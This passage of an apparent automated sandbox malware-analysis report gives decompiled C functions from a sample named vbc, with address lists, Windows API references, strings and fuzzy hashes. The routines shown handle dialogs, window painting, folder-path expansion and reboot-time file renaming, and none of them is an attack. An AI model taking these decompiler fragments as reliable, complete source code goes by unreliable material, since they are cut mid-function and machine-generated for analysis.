					E00404498( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
					_t118 = GetDlgItem(_a4, 0x3e8);
					E004044AB(_t118);
					SendMessageW(_t118, 0x45b, 1, 0);
					_t92 =  *( *0x7a8a70 + 0x68);
					if(_t92 < 0) {
						_t92 = GetSysColor( ~_t92);
					}
					SendMessageW(_t118, 0x443, 0, _t92);
					SendMessageW(_t118, 0x445, 0, 0x4010000);
					SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
					 *0x79ff14 = 0;
					SendMessageW(_t118, 0x449, _a8,  &_v16);
					 *0x79ff14 = 0;
					return 0;
				}
			}

0x00404647
0x00404767
0x00404774
0x004047d1
0x004047d1
0x004047d5
0x0040489b
0x004048a2
0x004048a4
0x004048a4
0x004048a4
0x004048aa
0x004048aa
0x004048ad
0x00000000
0x004048b4
0x004047e3
0x004047e9
0x004047ec
0x004047f3
0x004047f5
0x004047fc
0x004047fe
0x00404801
0x00404804
0x00404809
0x0040480f
0x00404812
0x00404819
0x00404826
0x00404837
0x0040483d
0x00404845
0x00404853
0x00404859
0x00404859
0x00404819
0x004047fc
0x0040485c
0x00404863
0x00000000
0x00404865
0x00404865
0x0040486c
0x00000000
0x00000000
0x0040486e
0x00404872
0x00404882
0x00404882
0x00404884
0x00404888
0x00404894
0x00404894
0x00000000
0x00404898
0x00404863
0x0040477c
0x0040477f
0x00000000
0x00000000
0x00404785
0x0040478b
0x00000000
0x00000000
0x00404791
0x00404796
0x00404796
0x00404799
0x0040479c
0x00000000
0x00000000
0x004047c3
0x004047c3
0x004047c5
0x004047c7
0x004047cc
0x00000000
0x0040464d
0x0040464d
0x00404650
0x00404655
0x00404666
0x00404666
0x0040466e
0x00404671
0x00404675
0x00404678
0x0040467c
0x0040467f
0x00404682
0x00404685
0x0040468c
0x0040468e
0x0040468e
0x00404698
0x004046a5
0x004046af
0x004046b4
0x004046b7
0x004046bc
0x004046d3
0x004046da
0x004046ed
0x004046f0
0x00404704
0x0040470b
0x00404710
0x00404715
0x00404715
0x00404723
0x00404731
0x00404743
0x00404748
0x00404758
0x0040475a
0x00000000
0x00404760

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046D3
GetDlgItem.USER32(?,000003E8), ref: 004046E7
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404704
GetSysColor.USER32 ref: 00404715
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404723
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404731
lstrlenW.KERNEL32(?), ref: 00404736
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404743
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404758
GetDlgItem.USER32(?,0000040A), ref: 004047B1
SendMessageW.USER32(00000000), ref: 004047B8
GetDlgItem.USER32(?,000003E8), ref: 004047E3
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404826
LoadCursorW.USER32 ref: 00404834
SetCursor.USER32(00000000), ref: 00404837
LoadCursorW.USER32 ref: 00404850
SetCursor.USER32(00000000), ref: 00404853
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404882
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404894

Strings

N, xrefs: 004047D1
Call, xrefs: 00404812

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Call$N
API String ID: 3103080414-3438112850
Opcode ID: 733b5ee76d40f44ee13d94ce5730b27edf6232bbb6d7c3eda73f746bb046eca6
Instruction ID: dae4caa8b62e847b2ebc6bc8f7d7cc953444b28573a7dbce8249495b0b2e45c9
Opcode Fuzzy Hash: 733b5ee76d40f44ee13d94ce5730b27edf6232bbb6d7c3eda73f746bb046eca6
Instruction Fuzzy Hash: 5361A0B6900609BFDB10AF60DD85E6A7B69FB85314F00C43AF605B62D0C77CA961CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00406160 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406160(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x7a55e8 = 0x55004e;
				 *0x7a55ec = 0x4c;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x7a5de8
					_t12 = GetShortPathNameW( *_t2, 0x7a5de8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x7a51e8, "%ls=%ls\r\n", 0x7a55e8, 0x7a5de8);
						_t53 = _t52 + 0x10;
						E00406557(_t37, 0x400, 0x7a5de8, 0x7a5de8,  *((intOrPtr*)( *0x7a8a70 + 0x128)));
						_t12 = E0040600A(0x7a5de8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E0040608D(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405F6F(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405F6F(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405FC5(_t24 + _t46, 0x7a51e8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E004060BC(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E0040600A(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x7a55e8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x00406160
0x00406169
0x00406170
0x0040617a
0x0040618e
0x004061b6
0x004061bd
0x004061c1
0x004061c5
0x004061e5
0x004061ec
0x004061f6
0x00406203
0x00406208
0x0040620d
0x00406211
0x00406220
0x00406222
0x0040622f
0x00406233
0x004062ce
0x00000000
0x00406249
0x00406256
0x0040627a
0x0040627e
0x0040629d
0x004062a1
0x004062a1
0x004062a3
0x004062ac
0x004062b7
0x004062c2
0x004062c8
0x00000000
0x004062c8
0x00406280
0x00406283
0x0040628e
0x0040628a
0x0040628c
0x0040628d
0x0040628d
0x00406295
0x00406297
0x00000000
0x00406297
0x00406261
0x00406267
0x00000000
0x00406267
0x00406233
0x00406211
0x00406190
0x0040619b
0x004061a4
0x004061a8
0x00000000
0x00000000
0x004061a8
0x004062d9

APIs

CloseHandle.KERNEL32(00000000), ref: 0040619B
GetShortPathNameW.KERNEL32 ref: 004061A4

Part of subcall function 00405F6F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F7F
Part of subcall function 00405F6F: lstrlenA.KERNEL32(00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB1

GetShortPathNameW.KERNEL32 ref: 004061C1
wsprintfA.USER32 ref: 004061DF
GetFileSize.KERNEL32(00000000,00000000,007A5DE8,C0000000,00000004,007A5DE8,?,?,?,?,?), ref: 0040621A
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406229
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406261
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A51E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062B7
GlobalFree.KERNEL32(00000000), ref: 004062C8
CloseHandle.KERNEL32(00000000), ref: 004062CF

Part of subcall function 0040600A: GetFileAttributesW.KERNELBASE(00000003,004030BD,007B6800,80000000,00000003,?,?,?,?,?,0040385A,?), ref: 0040600E
Part of subcall function 0040600A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406030

Strings

Uz, xrefs: 00406189
]z, xrefs: 004061BD
[Rename], xrefs: 00406249, 0040625B
%ls=%ls, xrefs: 004061D5
]z, xrefs: 004061B6

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]$Uz$]z$]z
API String ID: 2171350718-2304911260
Opcode ID: 83841883253fd663560c5337fe6472fb083831e0a70ac9398a254b13b8ba3a8f
Instruction ID: 21e35848ad9e0a4f6d0f4344ae9360a4b2933efdadd7627ed2dc2072c6695f7b
Opcode Fuzzy Hash: 83841883253fd663560c5337fe6472fb083831e0a70ac9398a254b13b8ba3a8f
Instruction Fuzzy Hash: 2D313771600715BBD220BB659D48F2B3A5CDF86764F16003EFD42F62C2EA7C9821867D

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x7a8a70;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x7a7a60, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x7a8a68;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,007A7A60,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 8a25a35e32ca6dce8bd23cc7af0fa44a7ac16e68086679f93291a7c2c2804fa7
Instruction ID: 94ee33a561faf14046f005448635b33146be7beb2ca28ebab25df4912e6f605d
Opcode Fuzzy Hash: 8a25a35e32ca6dce8bd23cc7af0fa44a7ac16e68086679f93291a7c2c2804fa7
Instruction Fuzzy Hash: 9E417C71800209AFCF058FA5DE459AF7BB9FF45315F00802AF991AA1A0CB789A55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00406557 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00406557(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x7a7a3c - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x7a8a98 + _t44 * 2;
				_t45 = 0x7a6a00;
				_t108 = 0x7a6a00;
				if(_a4 >= 0x7a6a00 && _a4 - 0x7a6a00 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E0040651A(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E00406557(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x7a6a00;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x7a9000;
								E0040651A(_t108, (_t78 << 0xb) + 0x7a9000);
							} else {
								E00406461(_t108,  *0x7a8a68);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004067A1(_t108);
							}
							goto L38;
						}
						if( *0x7a8ae4 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x7a8a64;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x7a8a68,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x7a8a68,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E004063E8( *0x7a8a98, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x7a8a98 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E00406557(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}

0x00406557
0x00406557
0x00406557
0x0040655d
0x00406562
0x00406573
0x00406573
0x0040657b
0x0040657c
0x0040657d
0x0040657e
0x00406581
0x00406589
0x0040658b
0x0040659c
0x0040659f
0x0040659f
0x004065a3
0x004065a9
0x004065ac
0x00406787
0x00406787
0x00406792
0x0040679e
0x0040679e
0x00000000
0x004065b2
0x004065b7
0x004065cc
0x004065cd
0x004065d3
0x00406765
0x00406773
0x00406776
0x00406776
0x00406767
0x0040676a
0x0040676d
0x0040676f
0x0040676f
0x00406778
0x00406778
0x0040677e
0x00406781
0x004065b4
0x00000000
0x004065b4
0x00000000
0x00406781
0x004065d9
0x004065dc
0x004065eb
0x004065f2
0x004065fe
0x00406601
0x00406604
0x00406605
0x0040660a
0x00406610
0x00406613
0x00406616
0x00406709
0x0040670e
0x00406741
0x00406746
0x0040674b
0x00406750
0x00406750
0x00406755
0x0040675b
0x0040675e
0x00000000
0x0040675e
0x00406710
0x00406713
0x00406716
0x0040672b
0x00406732
0x00406718
0x0040671f
0x0040671f
0x0040673a
0x0040673d
0x00406701
0x00406702
0x00406702
0x00000000
0x0040673d
0x00406623
0x00406627
0x00406627
0x00406628
0x0040662a
0x00406667
0x0040666a
0x0040667a
0x0040667d
0x00406685
0x0040668b
0x0040668b
0x004066e6
0x004066e6
0x004066e8
0x00000000
0x00000000
0x0040668f
0x00406694
0x00406695
0x00406697
0x004066ae
0x004066bc
0x004066c2
0x004066c4
0x004066e2
0x004066e2
0x004066e2
0x00000000
0x004066e2
0x004066ca
0x004066d3
0x004066d6
0x004066dc
0x004066e0
0x00000000
0x00000000
0x00000000
0x004066e0
0x004066a8
0x004066aa
0x004066ac
0x00000000
0x00000000
0x00000000
0x004066ac
0x00000000
0x004066e6
0x00406672
0x00000000
0x0040662c
0x0040664a
0x00406653
0x004066f0
0x004066f4
0x004066fc
0x004066fc
0x00000000
0x004066f4
0x0040665d
0x004066ea
0x004066ee
0x00000000
0x00000000
0x00000000
0x004066ee
0x0040662a
0x00000000
0x004065b7

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406672
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0F28,?,004055B3,007A0F28,00000000,00000000,0079BD28,7555110C), ref: 00406685
lstrcatW.KERNEL32 ref: 004066FC
lstrlenW.KERNEL32(Call,00000000,007A0F28,?,004055B3,007A0F28,00000000), ref: 00406756

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 004066F6
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406640
Call, xrefs: 00406581, 00406634, 0040663B, 0040663F, 0040665C, 00406671, 00406684, 00406699, 004066C6, 004066FB, 00406701, 0040671E, 00406731, 0040674F, 00406755, 0040675E, 00406794

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: Directory$SystemWindowslstrcatlstrlen
String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4260037668-1230650788
Opcode ID: da38963e672fb73e568923eb237ce0014ee8c8129af21826515d3029acbe5ea3
Instruction ID: 9e459ffa4d797bbc81f49b8710fc234ac44c95668d32beb4df18aeb57a87e6f9
Opcode Fuzzy Hash: da38963e672fb73e568923eb237ce0014ee8c8129af21826515d3029acbe5ea3
Instruction Fuzzy Hash: E061D271900206AADF109F64DC40BAE37A5AF55318F22C13BE917B72D0DB7D8AA1CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 004044DD Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044DD(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

0x004044ef
0x004045a5
0x00000000
0x004045a5
0x00404500
0x00404504
0x00000000
0x0040451e
0x0040451e
0x00404527
0x00000000
0x00000000
0x00404529
0x00404535
0x00404538
0x00404538
0x0040453e
0x00404544
0x00404544
